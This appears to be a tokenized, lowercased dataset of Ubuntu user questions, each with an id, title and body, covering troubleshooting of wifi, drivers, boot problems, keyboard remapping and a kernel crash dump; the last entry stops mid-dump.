508086	which .css theme file changes the buttons on top of nautilus ?	this is what i am talking about : i 'm making a theme and i do n't know what i should be looking for , but i think it is somewhere in the gtk.css file .
508087	wlan disconnects often	i am using a lenovo t440 with ubuntu 14.04 , gnome 3.10.4 and kernel 3.13.0-32-generic . my wlan disconnects often . so i researched a bit about the problem and found out that maybe the module is n't fitting . so , in my notebook is a realtek semiconductor co. , ltd. rtl8192ee pcie wireless network adapter which needs ( maybe ) the module rtl8192e . i am not 100 % sure . right now it loads the module intel corporation wireless 7260 which i found out through lspci -nnk edit from comments : lspci -nn | grep 0280 result : network controller [ 0280 ] : intel corporation wireless 7260 [ 8086:08b2 ] ( rev 6b ) anyway i found the module for my wlan adapter in /lib/modules/ $ ( uname -r ) /kernel/drivers/staging/rtl8192e/rtl8192e/r8192e_pci.ko and i had the idea to load this module and let replace the old module . but if i want to load it with insmod /lib/modules/ $ ( uname -r ) /kernel/drivers/staging/rtl8192e/rtl8192e/r8192e_pci.ko it is refused by insmod : error : could not insert module rtl8192e/r8192e_pci.ko : unknown symbol in module i ca n't see the solution . am i taking the right path ? is the module replacement the right choice ? does anyone see the solution ?
508089	what is the diference between a normal boot and resume option after a recovery boot ?	i have an ubuntu 12.04.5 server machine that hangs on boot , but if i choose recovery mode and then resume , everything 's ok. any clue ? !
508091	how to update tor browser from terminal ?	how to update tor browser from terminal ?
508092	how can i reduce the delay of tap click ?	i just installed ubuntu 14.04.1 x64 . everything works pretty fast except when i tap to click it has a delay of about .5 seconds . this is quite a problem since i want to work fast . for example i click on the google input field in the browser and start typing.. about 3 letters are written elsewhere , not in the search bar , also keeps draging and selecting . i can not be waiting for this much delay on every click and have no liking into being force to use the button below the touchpad . i 've read something about fasttaps , but that option seems to be missing along with the xorg.conf file and xorg.conf.d folder in etc/x11 . also i am a beginer at linux . details : also got windows7 on a different partition have n't created a swap file/partition yet ram : 2gb cpu : intel ( r ) core ( tm ) 2 duo cpu t5800 @ 2.00ghz
508096	how can i get hunspell to use australian english ?	i use a few programs that do spellchecking via hunspell , but they seem to check against us english . it 'd be beaut if they 'd use australian english ( maaaaybe uk english if there 's buckley 's of strine ) . my language-related environment variables look right : lang=en_au.utf-8 language=en_au : en i 've fossicked about for any hunspell-en-au|gb|etc packages , but they seem to have gone bush in 14.04 . what 's the fix ?
508098	depending on postgresql-plpython for every installed version of postgresql	i 'm working on a project which gets installed as an ubuntu package . this is part of the code for generating the database ( modified ) : create extension plpythonu ; create function foo ( str text ) returns text as $ $ ... $ $ language plpythonu ; because of this , i 've put postgresql-plpython on my depends row . this works fine as long as i 'm simply installing everything on either ubuntu 12.04 lts or 14.04 lts , but i run into problems when i upgrade from 12.04 to 14.04 . after the os upgrade , both postgresql 9.1 and 9.3 are installed pending the database upgrade , but despite this only postgresql-plpython-9.1 ( not postgresql-plpython-9.3 ) is installed . it seems like ubuntu gets confused when there are two postgresql versions . with only one version , installing postgresql-plpython is not a problem , but with two versions i get package postgresql-plpython is a virtual package provided by : postgresql-plpython-9.1 9.1.13-0ubuntu0.12.04 postgresql-plpython-9.3 9.3.5-0ubuntu0.14.04.1 you should explicitly select one to install . if i manually run apt-get install postgresql-plpython-9.3 before running pg_upgradecluster 9.1 main everything works , but i would prefer it if i could write proper dependencies . can i somehow depend on postgresql-plpython being installed for every installed version of postgresql ?
508099	new 14.04 install on workstation - suggish performance	machine details dell precision m4800 laptop intel i7-4900mq nvidia quadro k2100 16gb memory 240gb ssd hi , i was running windows 8 for a while but finally decided to make the switch to ubuntu . i installed 14.04 on a 2nd ssd hard disk and apart from some issues with the graphics card everything went well . ran this setup for a couple of days ( dual booting with win8 ) and it was great . i then decided to format the machine and install 14.04 as the only os . applied same fixes for nvidia card but the machine is sluggish . it feels as if it running on 2gb or ram not 16gb . opening up chrome can take up to 10 seconds - launching any other app takes almost as long . it also seems to stutter - so if i 'm typing away it will choke then put what ive written on the screen . any pointers on where to look would be great as googling for the last 12 hours hasnt helped . p.s . dell have disabled the nvidia optimus at a hardware level - so the laptop only runs on the main card . not sure if related
508101	should i format my hard drive when upgrading from 13.10 to 14.04 ?	i have a pc with ubuntu 13.10 installed , and i want to upgrade to ubuntu 14.04 . i want to do a clean install , that is , i do n't want to keep any of my programs . in windows , there 's an option that moves all my files to a folder named windows.old . is there a similar option with ubuntu ? or do i need to format my hard drive ?
508102	installing ubuntu server 14.04.1 with no internet connection	i 'm trying to install ubuntu server 14.04.1 with no internet connection - and i 'm going round in circles as i keep getting prompted for a mirror etc . i 'm sure i 'm missing something obvious ... ... i assume all i need is packaged in the iso ? the machine i 'm using has 2 network cards but i do n't have internet connectivity . -additional info . from the ubuntu installer main menu i have : chosen a language - success configured the keyboard - success detected network hardware - success configure the network - success ( no internet connection available ) choose a mirror of the ubuntu archive - unsuccessful as have no internet connection download installer components - ca n't due to no internet connection not sure what to do next ... .. do i have to execute a shell and install that way and if so how ? any help would be much appreciated .
508104	xmodmap remapping modifiers not working ?	i am using a new keyboard , and trying to set it up to mimic the keyboard on my laptop . i 'm using xmodmap on ubuntu 14.04 , and ca n't get it to work . i cleared the modifier keys like so : xmodmap -e `` clear mod1 '' xmodmap -e `` clear mod4 '' xmodmap -e `` clear control '' and that works fine , afterwards the modifiers do n't do anything . after that , i try to assign the alt_r key to act as a super key , like so : xmodmap -e `` add mod1 = alt_r '' however , the alt button then goes back to behaving like an alt button , instead of behaving like super and bringing up the unity search when it 's tapped . is there a trick to getting the modifiers working with xmodmap ? additionally , even after clearing control , with `` xmodmap -e `` clear control '' , i can still use ctrl . the keyboard i 'm using is the das keyboard s ultimate , if that matters at all . edit : a realization i made while messing around with xev and trying to solve the problem : when i run something like `` xmodmap -e `` keycode 133 = alt_l '' ( keycode 133 is usually super ) , and then launch xev , when i look at the output it shows this : keyrelease event , serial 37 , synthetic no , window 0x2000001 , root 0x9e , subw 0x0 , time 179020 , ( -382,66 ) , root : ( 406,118 ) , state 0x40 , keycode 133 ( keysym 0xffe9 , alt_l ) , same_screen yes , xkeysymtokeycode returns keycode : 64 xlookupstring gives 0 bytes : xfilterevent returns : false as you can see , it sees the key press as alt_l . however , the key is still behaving like a super key , activating the unity search when pressed .
508106	dhcp leases flash of docker	i 've docker container , it uses internal dhcp to assign the ip to its network interface . each time i stop and run the container again , the new ip is assigned , ex : 172.17.0.2 , 172.17.0.3 , 172.17.0.4 etc once i restart computer , the dhcp starts to assign ip from the beginning - 172.17.0.2 is there any way to flash the current dhcp cache ( leases ) to always have 172.17.0.2 ip assigned when i run a container again without restarting pc ?
508108	the pernicious usb-stick stall problem . is it fixed in 14.04 ?	there 's a known bug in ubuntu that causes the system to freeze when copying files to a external hard drive ( see http : //unix.stackexchange.com/q/107703/56755 and http : //lwn.net/articles/572911/ ) . i can testify that this bug is still a problem in 13.10 . is this issue fixed in version 14.04 , or 14.04.1 ?
508112	fail to driver swrast minecraft python	under kubuntu 14.04 trusty , my graphic card is a nvidia gtx geforce 760 . i am trying to play with minecraft implemented with python and pyglet when trying to lauch the game ( python main.py ) , i have the following error : $ libgl_debug=verbose python main.py libgl : screen 0 does not appear to be dri3 capable libgl : screen 0 does not appear to be dri2 capable libgl : opendriver : trying /usr/lib/x86_64-linux-gnu/dri/tls/swrast_dri.so libgl : opendriver : trying /usr/lib/x86_64-linux-gnu/dri/swrast_dri.so libgl : driver does not expose __dridrivergetextensions_swrast ( ) : /usr/lib/x86_64-linux-gnu/dri/swrast_dri.so : undefined symbol : __dridrivergetextensions_swrast libgl : ca n't open configuration file /home/oliver/.drirc : no such file or directory . libgl : ca n't open configuration file /home/oliver/.drirc : no such file or directory . libgl error : failed to load driver : swrast i am searching for one week the reason and a solution to this problem , if i found a lot of related posts i did not find the solution . below is some informations and what i tried : $ glxinfo | grep version server glx version string : 1.4 client glx version string : 1.4 glx version : 1.4 opengl core profile version string : 4.3.0 nvidia 331.38 opengl core profile shading language version string : 4.30 nvidia via cg compiler opengl version string : 4.4.0 nvidia 331.38 opengl shading language version string : 4.40 nvidia via cg compiler there is indeed no /usr/lib/x86_64-linux-gnu/dri/tls/swrast_dri.so , but the other one is there : $ l /usr/lib/x86_64-linux-gnu/dri/tls/swrast_dri.so ls : impossible d'accéder à /usr/lib/x86_64-linux-gnu/dri/tls/swrast_dri.so : aucun fichier ou dossier de ce type $ l /usr/lib/x86_64-linux-gnu/dri/swrast_dri.so /usr/lib/x86_64-linux-gnu/dri/swrast_dri.so i list the dependencies of swrast_dri.so : $ ldd /usr/lib/x86_64-linux-gnu/dri/swrast_dri.so linux-vdso.so.1 = > ( 0x00007fff4b070000 ) libgallium.so.0 = > /usr/lib/x86_64-linux-gnu/libgallium.so.0 ( 0x00007f9b5c875000 ) libexpat.so.1 = > /lib/x86_64-linux-gnu/libexpat.so.1 ( 0x00007f9b5c64b000 ) libpthread.so.0 = > /lib/x86_64-linux-gnu/libpthread.so.0 ( 0x00007f9b5c42c000 ) libdl.so.2 = > /lib/x86_64-linux-gnu/libdl.so.2 ( 0x00007f9b5c228000 ) libllvm-3.4.so.1 = > /usr/lib/x86_64-linux-gnu/libllvm-3.4.so.1 ( 0x00007f9b5a887000 ) libstdc++.so.6 = > /usr/lib/x86_64-linux-gnu/libstdc++.so.6 ( 0x00007f9b5a582000 ) libm.so.6 = > /lib/x86_64-linux-gnu/libm.so.6 ( 0x00007f9b5a27c000 ) libc.so.6 = > /lib/x86_64-linux-gnu/libc.so.6 ( 0x00007f9b59eb6000 ) libgcc_s.so.1 = > /lib/x86_64-linux-gnu/libgcc_s.so.1 ( 0x00007f9b59c9f000 ) /lib64/ld-linux-x86-64.so.2 ( 0x00007f9b5d3c5000 ) libffi.so.6 = > /usr/lib/x86_64-linux-gnu/libffi.so.6 ( 0x00007f9b59a97000 ) libtinfo.so.5 = > /lib/x86_64-linux-gnu/libtinfo.so.5 ( 0x00007f9b5986e000 ) all the lib mentionned above seem ok . i look at the symbols of swrast_dri.so : $ readelf -ws /usr/lib/x86_64-linux-gnu/dri/swrast_dri.so there are no trace of a __dridrivergetextensions_swrast concerning dri i checked my packages : $ ls -latr /var/lib/dpkg/info/*.list | grep dri | grep -v printer -rw-r -- r -- 1 root root 276 apr 24 17:42 /var/lib/dpkg/info/libxcb-dri2-0 : amd64.list -rw-r -- r -- 1 root root 276 apr 24 17:44 /var/lib/dpkg/info/libxcb-dri3-0 : amd64.list -rw-r -- r -- 1 root root 270 mai 1 11:19 /var/lib/dpkg/info/libxcb-dri2-0 : i386.list -rw-r -- r -- 1 root root 270 mai 1 11:19 /var/lib/dpkg/info/libxcb-dri3-0 : i386.list -rw-r -- r -- 1 root root 1388 jun 20 16:40 /var/lib/dpkg/info/libgl1-mesa-dri : amd64.list -rw-r -- r -- 1 root root 1344 jun 20 16:40 /var/lib/dpkg/info/libgl1-mesa-dri : i386.list -rw-r -- r -- 1 root root 420 jun 20 16:40 /var/lib/dpkg/info/libegl1-mesa-drivers : amd64.list -rw-r -- r -- 1 root root 2525 jun 20 16:41 /var/lib/dpkg/info/ubuntu-drivers-common.list -rw-r -- r -- 1 root root 494 jun 20 16:43 /var/lib/dpkg/info/cups-filters-core-drivers.list -rw-r -- r -- 1 root root 600 jun 20 16:45 /var/lib/dpkg/info/kubuntu-driver-manager.list -rw-r -- r -- 1 root root 411 jul 10 07:50 /var/lib/dpkg/info/libxcb-dri3-dev : amd64.list -rw-r -- r -- 1 root root 417 jul 10 07:50 /var/lib/dpkg/info/libxcb-dri2-0-dev : amd64.list -rw-r -- r -- 1 root root 407 jul 10 07:50 /var/lib/dpkg/info/x11proto-dri2-dev.list -rw-r -- r -- 1 root root 299 jul 29 08:59 /var/lib/dpkg/info/cups-core-drivers.list -rw-r -- r -- 1 root root 737 jul 29 09:01 /var/lib/dpkg/info/libreoffice-base-drivers.list -rw-r -- r -- 1 root root 1377 aug 7 12:03 /var/lib/dpkg/info/libgl1-mesa-dri-dbg : amd64.list -rw-r -- r -- 1 root root 183 aug 7 12:03 /var/lib/dpkg/info/libgl1-mesa-dri-lts-trusty : amd64.list -rw-r -- r -- 1 root root 195 aug 7 12:03 /var/lib/dpkg/info/libgl1-mesa-dri-lts-trusty-dbg : amd64.list concerning mesa : $ ls -latr /var/lib/dpkg/info/*.list | grep mesa -rw-r -- r -- 1 root root 353 apr 24 17:38 /var/lib/dpkg/info/libglu1-mesa : amd64.list -rw-r -- r -- 1 root root 1388 jun 20 16:40 /var/lib/dpkg/info/libgl1-mesa-dri : amd64.list -rw-r -- r -- 1 root root 1344 jun 20 16:40 /var/lib/dpkg/info/libgl1-mesa-dri : i386.list -rw-r -- r -- 1 root root 635 jun 20 16:40 /var/lib/dpkg/info/libgl1-mesa-glx : i386.list -rw-r -- r -- 1 root root 649 jun 20 16:40 /var/lib/dpkg/info/libgl1-mesa-glx : amd64.list -rw-r -- r -- 1 root root 533 jun 20 16:40 /var/lib/dpkg/info/libgles2-mesa : amd64.list -rw-r -- r -- 1 root root 441 jun 20 16:40 /var/lib/dpkg/info/libwayland-egl1-mesa : amd64.list -rw-r -- r -- 1 root root 420 jun 20 16:40 /var/lib/dpkg/info/libegl1-mesa-drivers : amd64.list -rw-r -- r -- 1 root root 478 jun 20 16:40 /var/lib/dpkg/info/libglapi-mesa : amd64.list -rw-r -- r -- 1 root root 472 jun 20 16:40 /var/lib/dpkg/info/libglapi-mesa : i386.list -rw-r -- r -- 1 root root 547 jun 20 16:40 /var/lib/dpkg/info/libopenvg1-mesa : amd64.list -rw-r -- r -- 1 root root 566 jun 20 16:40 /var/lib/dpkg/info/libegl1-mesa : amd64.list -rw-r -- r -- 1 root root 5766 jul 10 07:50 /var/lib/dpkg/info/mesa-common-dev.list -rw-r -- r -- 1 root root 537 jul 10 07:50 /var/lib/dpkg/info/libgl1-mesa-dev.list -rw-r -- r -- 1 root root 425 jul 10 07:50 /var/lib/dpkg/info/libglu1-mesa-dev.list -rw-r -- r -- 1 root root 482 jul 23 10:18 /var/lib/dpkg/info/libmirclientplatform-mesa : amd64.list -rw-r -- r -- 1 root root 799 jul 23 10:18 /var/lib/dpkg/info/libegl1-mesa-dev.list -rw-r -- r -- 1 root root 754 jul 23 10:18 /var/lib/dpkg/info/libgles2-mesa-dev.list -rw-r -- r -- 1 root root 482 jul 29 09:47 /var/lib/dpkg/info/mesa-utils-extra.list -rw-r -- r -- 1 root root 0 jul 29 09:49 /var/lib/dpkg/info/libglu1-mesa : i386.list -rw-r -- r -- 1 root root 0 jul 29 09:50 /var/lib/dpkg/info/libosmesa6 : amd64.list -rw-r -- r -- 1 root root 0 jul 29 09:50 /var/lib/dpkg/info/libosmesa6 : i386.list -rw-r -- r -- 1 root root 390 aug 7 11:52 /var/lib/dpkg/info/mesa-utils.list -rw-r -- r -- 1 root root 1377 aug 7 12:03 /var/lib/dpkg/info/libgl1-mesa-dri-dbg : amd64.list -rw-r -- r -- 1 root root 183 aug 7 12:03 /var/lib/dpkg/info/libgl1-mesa-dri-lts-trusty : amd64.list -rw-r -- r -- 1 root root 195 aug 7 12:03 /var/lib/dpkg/info/libgl1-mesa-dri-lts-trusty-dbg : amd64.list -rw-r -- r -- 1 root root 515 aug 7 12:03 /var/lib/dpkg/info/libgl1-mesa-glx-dbg : amd64.list i reinstalled my nvidia driver via the kubuntu driver manager , i have nom version 3331-38 from nvidia-33-updates but the problem remains i found someone saying that one have to reinstall libdrm to solve this problem , but muon tells me that it is not possible to mark the libdrm packages to remove or update . may be what follow can be interested : $ dpkg -l libgl1\* souhait=inconnu/installé/supprimé/purgé/h=à garder | état=non/installé/fichier-config/dépaqueté/échec-config/h=semi-installé/w=attend-traitement-déclenchements |/ err ? = ( aucune ) /besoin réinstallation ( état , err : majuscule=mauvais ) ||/ nom version architecture description +++-========================================-========================-================-============================================================== un libgl1 < aucun > < aucune > ( aucune description n'est disponible ) ii libgl1-mesa-dev 10.1.3-0ubuntu0.1 amd64 free implementation of the opengl api -- glx development files ii libgl1-mesa-dri : amd64 10.1.3-0ubuntu0.1 amd64 free implementation of the opengl api -- dri modules ii libgl1-mesa-dri : i386 10.1.3-0ubuntu0.1 i386 free implementation of the opengl api -- dri modules ii libgl1-mesa-dri-dbg : amd64 10.1.3-0ubuntu0.1 amd64 debugging symbols for the mesa dri modules un libgl1-mesa-dri-dev < aucun > < aucune > ( aucune description n'est disponible ) un libgl1-mesa-dri-experimental < aucun > < aucune > ( aucune description n'est disponible ) un libgl1-mesa-dri-experimental-dbg < aucun > < aucune > ( aucune description n'est disponible ) ii libgl1-mesa-dri-lts-trusty : amd64 3:6 amd64 transitional package for libgl1-mesa-dri ii libgl1-mesa-dri-lts-trusty-dbg : amd64 3:6 amd64 transitional package for libgl1-mesa-dri-dbg ii libgl1-mesa-glx : amd64 10.1.3-0ubuntu0.1 amd64 free implementation of the opengl api -- glx runtime ii libgl1-mesa-glx : i386 10.1.3-0ubuntu0.1 i386 free implementation of the opengl api -- glx runtime ii libgl1-mesa-glx-dbg : amd64 10.1.3-0ubuntu0.1 amd64 debugging symbols for the mesa glx runtime un libgl1-mesa-glx-no-multiarch < aucun > < aucune > ( aucune description n'est disponible ) un libgl1-mesa-swx11 < aucun > < aucune > ( aucune description n'est disponible ) un libgl1-mesa-swx11-dev < aucun > < aucune > ( aucune description n'est disponible ) un libgl1-nvidia-alternatives < aucun > < aucune > ( aucune description n'est disponible ) finally i tried to update my nvidia drivers with : $ sudo add-apt-repository ppa : ubuntu-x-swat/x-updates $ sudo apt-get update $ sudo apt-get install nvidia-current now i have : $ glxinfo | grep version server glx version string : 1.4 client glx version string : 1.4 glx version : 1.4 opengl version string : 2.1.2 nvidia 331.38 opengl shading language version string : 1.20 nvidia via cg compiler which seems to be a regression compared with the output of $ glxinfo | grep version given at the beginning of this post , is n't it ? shortly , i am maybe more interested on how to understand the problem and find the solution rather than a how-of-the-box solution . all suggestions/explanations/ ... would be highly appreciate
508116	exfat vs ntfs . is exfat stable enough in 14.04 ?	is exfat stable enough in ubuntu 14.04 ? i have an external usb hard drive that i need to access from windows and ubuntu . should i use exfat or ntfs ? if i only were using windows pcs , i would go for exfat . but now that i need to access the drive from ubuntu too , i am considering ntfs because it has a longer support in that system . can someone post a list of cons and pros ?
508117	ubuntu 14.04 does n't login on vaio	i have a vaio vcpeb1e0e with the broken screen so i have it on an external screen . i just installed ubuntu 14.04 and added some other programs that i need ( inkscape , gimp , ... ) . after that i tried suspending it at it just freezed . so i turned it off manually and tried to turn it on . i get up to the login screen , where i enter my password , butt after that it freezes . it stucks like that for couple of minutes , then black screen with mouse pointer , then login screen again . retype my password and it stays like that ( freeze ) . i have no idea what to do , because i can only operate through the external screen ( all this time the primary screen is on ) . any help ? thanks update : after couple of minutes ( 5 ) login screen is back and everything goes around and around ...
508118	installing xubuntu . should i use repositories or install directly from the xubuntu disc image ?	i am considering two options for installing xubuntu 14.04.1 on my pc . i can install ubuntu using this disc image , and then use the repositories to install the xubuntu desktop . the other option is to install xubuntu using this disc image directly . what are the differences between these two paths to getting the xubuntu desktop on my pc ? what are the pros and cons ?
508124	install ubuntu on second hard drive without cd/dvd	i 'm trying to install ubuntu but i do n't have a cd/dvd burner or large flash drive . i do have access to a second computer and i 've hooked up the hard drive to it . how can i install ubuntu on that hard drive ? it seems that this should be easy but i ca n't find a way to do it .
508126	javapath is not showing	i installed java , but i do n't get the java path when i am typing echo $ java_home , and also i am getting the following error message when i open a terminal bash : /home/ramesh/.bashrc : line 128 : syntax error : unexpected end of file ramesh @ ramesh-h61m-s2p-b3 : ~ $ echo $ java_home
508127	ltsp installation step failed	today i 've tried installing an ltsp server on a virtual machine ( host : win 8 x64 , virtualbox 4.3.6 r191406 as the newer versions have problems ) , i gave it an additional nic as host only . everything was going fine until i got this error : [ ! ! ] build ltsp chroot installation step failed an installation step failed . you can try to un the failing item again from the menu , or skip it and choose something else . the failing step is : build ltsp chroot . nb : i downloaded the ubuntu- 12.04.4-alternate-amd64.iso version . where is the problem coming from , and how can i fix this ?
508132	migrating ubuntu from a mbr disk to a gpt disk ( non-uefi )	the question is : how to migrate ubuntu installed on a lvm logical volume with a separate boot partition from a mbr disk to a gpt disk on non- ( u ) efi hardware without data loss to enable the usage of partitions larger than 2tb ?
508135	ubuntu boot hangs	i 'm using ubuntu lts12.04 and i 'm having a serious issue . when i boot my computer , the ubuntu starting screen ( with the 5 dots ) is loading , the dots are filling but then the process hangs ( the 5 dots are full but nothing happens ) . i can still get the console interface through ctrl+alt+f1 . so i try to restart the `` display manager '' ( not sure what i 'm talking about ) with the following command : sudo service lightdm restart this command returns me no error , but when i 'm switching back to the graphical interface ( with alt+f7 ) , the following message is hanging checking battery state ... . any piece of advice would be appreciated ! regards , nicolas
508138	making the switch to ubuntu	i want to install ubuntu natively on my gaming laptop . i feel comfortable and confident in troubleshooting most things , and have installed ubuntu on an older laptop of mine before about a year ago . i want to switch due to my most recent niche for developing and linux . i 'm worried i 'll have driver issues or some freak error resulting in a hard-brick ; a $ 2,000 paperweight . i 'd follow all the a-z backups and basic precautionary steps of course . what 's the worst that could happen ? manufacturer : maingear computers memory : 16.0 gb ram gpu : geforce gtx 770m cpu : intel ( r ) core ( tm ) i7-4800mq cpu @ 2.70ghz graphics : intel ( r ) hd graphics 4600 network adapters : killer wireless-n 1202 ( 2.4ghz and 5ghz ) killer e2200 pci-e gigabit ethernet controller
508139	fresh install of ubuntu ssh only working from localhost	i installed the latest version of ubuntu on esxi as a vm . i then installed openssh and it worked once from a remote machine and got hung up when trying to execute a command on mysql . ever since i can only ssh to the vm from within itself ( localhost can ssh to itself but nothing else ) . any ideas ? error shown is ssh : connect to host 192.168.1.11 port 22 : operation timed out edit as per dan08 i reran ssh with -v and now it 's working . very weird . nothing has changed . box was n't restarted or anything .
508140	not able to replace funny characters	i received this data from windows user for some bulk replacements . but there are some odd characters which need to be replaced first ( the block characters in image ) . my script is not replacing them . how can this be achieved .
508143	operation not possible due to rf-kill , phy0 hard blocked	i know there are already plenty of questions like this one ; the problem is that , although i tried to follow the instructions , i could n't have my wifi to work . i re-installed lubuntu 14.04 on my netbook yesterday because of some other problems i was having ( `` waiting for network configuration '' on startup and i could n't log in ( after entering the password , i was given a black screen and then back to the login screen ) ) . anyway , i was able to use the netbook properly for a few hours ; then i got back home , and the wifi was n't working anymore . i tried # ifconfig wlan0 up and i got siocsifflags : operation not possible due to rf-kill . # rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : yes 1 : asus-wlan : wireless lan soft blocked : no hard blocked : no the problem is most likely with the phy0 `` hard blocked '' . using rfkill unblock all did n't do anything . i am pretty sure i do n't have any wifi buttons on the netbook ( asus 1225c ) , apart from fn+f2 . when i try the previous combination of keys i get 0 : phy0 : wireless lan soft blocked : yes hard blocked : yes 1 : asus-wlan : wireless lan soft blocked : yes hard blocked : no somebody said to try to remove /dev/rfkill , and it still did n't work . i restored the bios to the default settings , and even made sure that wlan was enabled . i then tried to boot from a live distro ( the lubuntu 14.04 ) and i still got the very same problem . do you have any other ideas on what could be causing this problem ? i am starting to think that it is due to some hardware problem but it seems unlikely , since it was working just fine a couple of hours earlier . thank you !
508147	restore ubuntu 's default ui	i recently switch over to ubuntu 13.04 , i used it on my laptop it worked pretty great , then i updated it to 13.10 , and then i further updated it to 14.04 , while upgrading to 14.04 my ui suddenly crashed i do n't know why , i somehow installed gnome package using command `` sudo apt-get install gnome '' , my ui worked but i did n't like that ui at all . is there any solution to restore ubuntu 's default ui ? i tried deleting ~/.config files but that did n't work please help expecting for positive reply ^_^
508148	can not move window because the title bar is above the screen	sometimes i open a new window in a program ( such as a new notebook in mathematica ) , and the title bar of the window appears above the screen , so i can not drag the window around . what can i do when this happens ? is there a command i can use in the terminal to maximize the window , or to change its location ?
508149	electric diagrams applications	i 'm currently want to install an application to draw electric diagrams but i do not succeed . i want to know if these applications exist for ubuntu , and if so , how to do to install ?
508153	vlc installation problem on ubuntu 14.04 lts	http : //imgur.com/5u0iy2k this is the error i am getting while installing vlc media player on ubuntu 14.04 lts , kindly help me with it , because i want to run my videos and audios on ubuntu as well
508154	tcp hash tables in linux kernel	i have implemented a solution to migrate sockets between servers running linux os . the migration mechanism works very well and the client is capable of continuing receiving his service from the new server . the solution consists of two parts : a user space process and a linux kernel module . currently i have only one problem , when the importing server tries to close the migrated socket , the whole machine freezes . whereas when the client does the closing , the importing machine does not hang directly , it hangs after afew trials . i was able to dump the kernel and get the error log . after some inspections , i believe that i am missing adding the migrated socket to a hash table in the linux kernel . currently i am adding the tcp connection to the following hash table only . int tcp_hash_add ( struct sock *sk ) { sk- > sk_prot- > hash ( sk ) ; } can anyone help me and tell me what i am missing in the importing side ? i think that in a normal server-client tcp application , when the client sends a request to the server . the server creates an independent socket to that connection , and it obtains some correlation information between the original listening socket and the accepted socket . and this is might be what i am missing the importing side . linux kernel dump : [ 225.717049 ] bug : unable to handle kernel null pointer dereference at 0000000000000020 [ 225.720544 ] ip : [ < ffffffff8162056c > ] __inet_twsk_hashdance+0x8c/0x160 [ 225.720544 ] pgd 7bbf9067 pud 7b7fc067 pmd 0 [ 225.720544 ] oops : 0000 [ # 1 ] smp [ 225.720544 ] modules linked in : sockmi ( of ) nf_conntrack ( f ) vesafb ( f ) vboxsf ( of ) snd_int ) [ 225.720544 ] cpu 0 [ 225.720544 ] pid : 0 , comm : swapper/0 tainted : gf w o 3.8.0-29-generic # 42~precisx [ 225.720544 ] rip : 0010 : [ < ffffffff8162056c > ] [ < ffffffff8162056c > ] __inet_twsk_hashdance0 [ 225.720544 ] rsp : 0018 : ffff88007fc039d0 eflags : 00010282 [ 225.720544 ] rax : 0000000000000000 rbx : ffff88005cbd5000 rcx : ffffffff81e304c0 [ 225.720544 ] rdx : 0000000000001c37 rsi : 0000000000000082 rdi : 0000000000000009 [ 225.720544 ] rbp : ffff88007fc03a00 r08 : 000000000000000a r09 : 0000000000000000 [ 225.720544 ] r10 : 000000000000021a r11 : 0000000000000219 r12 : ffff88007ba4b800 [ 225.720544 ] r13 : ffffc9000035a7d0 r14 : ffffc90000322500 r15 : ffff88007c1e3d40 [ 225.720544 ] fs : 0000000000000000 ( 0000 ) gs : ffff88007fc00000 ( 0000 ) knlgs:000000000000000 [ 225.720544 ] cs : 0010 ds : 0000 es : 0000 cr0 : 000000008005003b [ 225.720544 ] cr2 : 0000000000000020 cr3 : 000000007965f000 cr4 : 00000000000006f0 [ 225.720544 ] dr0 : 0000000000000000 dr1 : 0000000000000000 dr2 : 0000000000000000 [ 225.720544 ] dr3 : 0000000000000000 dr6 : 00000000ffff0ff0 dr7 : 0000000000000400 [ 225.720544 ] process swapper/0 ( pid : 0 , threadinfo ffffffff81c00000 , task ffffffff81c15 ) [ 225.720544 ] stack : [ 225.720544 ] ffff88007ba4b800 ffff88007ba4b800 ffff88005cbd5000 0000000000000000 [ 225.720544 ] 000000000000001f 0000000000000000 ffff88007fc03a50 ffffffff8163de3c [ 225.720544 ] ffff8800000000d9 000000065cb8b300 ffff88003652e262 ffff88007ba4b800 [ 225.720544 ] call trace : [ 225.720544 ] < irq > [ 225.720544 ] [ < ffffffff8163de3c > ] tcp_time_wait+0x1bc/0x290 [ 225.720544 ] [ < ffffffff8162d4fe > ] tcp_fin+0x10e/0x1c0 [ 225.720544 ] [ < ffffffff8162e078 > ] tcp_data_queue+0x3e8/0x580 [ 225.720544 ] [ < ffffffff81631bb5 > ] tcp_rcv_state_process+0x2b5/0x6b0 [ 225.720544 ] [ < ffffffff8163abc7 > ] tcp_v4_do_rcv+0xc7/0x220 [ 225.720544 ] [ < ffffffff8163c829 > ] tcp_v4_rcv+0x569/0x830 [ 225.720544 ] [ < ffffffff81616366 > ] ip_local_deliver_finish+0xe6/0x280 [ 225.720544 ] [ < ffffffff8161668a > ] ip_local_deliver+0x4a/0x90 [ 225.720544 ] [ < ffffffff81616039 > ] ip_rcv_finish+0x119/0x360 [ 225.720544 ] [ < ffffffff816168ed > ] ip_rcv+0x21d/0x300 [ 225.720544 ] [ < ffffffff815e355a > ] __netif_receive_skb+0x5fa/0x760 [ 225.720544 ] [ < ffffffff8163cbae > ] ? tcp4_gro_receive+0x9e/0x110 [ 225.720544 ] [ < ffffffff815e36e3 > ] netif_receive_skb+0x23/0x90 [ 225.720544 ] [ < ffffffff815e3e28 > ] napi_gro_receive+0xe8/0x140 [ 225.906423 ] [ < ffffffffa0002f98 > ] e1000_clean_rx_irq+0x2b8/0x520 [ e1000 ] [ 225.906423 ] [ < ffffffff8144df56 > ] ? credit_entropy_bits.part.7+0x176/0x1d0 [ 225.906423 ] [ < ffffffffa0004801 > ] e1000_clean+0x51/0xc0 [ e1000 ] [ 225.906423 ] [ < ffffffff815e4cd4 > ] net_rx_action+0x134/0x260 [ 225.906423 ] [ < ffffffff81045136 > ] ? native_safe_halt+0x6/0x10 [ 225.906423 ] [ < ffffffff81062620 > ] __do_softirq+0xc0/0x240 [ 225.906423 ] [ < ffffffff8103cca2 > ] ? ack_apic_level+0x72/0x130 [ 225.906423 ] [ < ffffffff816fdd5c > ] call_softirq+0x1c/0x30 [ 225.906423 ] [ < ffffffff81016775 > ] do_softirq+0x65/0xa0 [ 225.906423 ] [ < ffffffff810628fe > ] irq_exit+0x8e/0xb0 [ 225.906423 ] [ < ffffffff816fe5f3 > ] do_irq+0x63/0xe0 [ 225.906423 ] [ < ffffffff816f406d > ] common_interrupt+0x6d/0x6d [ 225.906423 ] < eoi > [ 225.906423 ] [ < ffffffff81084008 > ] ? hrtimer_start+0x18/0x20 [ 225.906423 ] [ < ffffffff81045136 > ] ? native_safe_halt+0x6/0x10 [ 225.906423 ] [ < ffffffff8101cc33 > ] default_idle+0x53/0x1f0 [ 225.906423 ] [ < ffffffff8101dad9 > ] cpu_idle+0xd9/0x120 [ 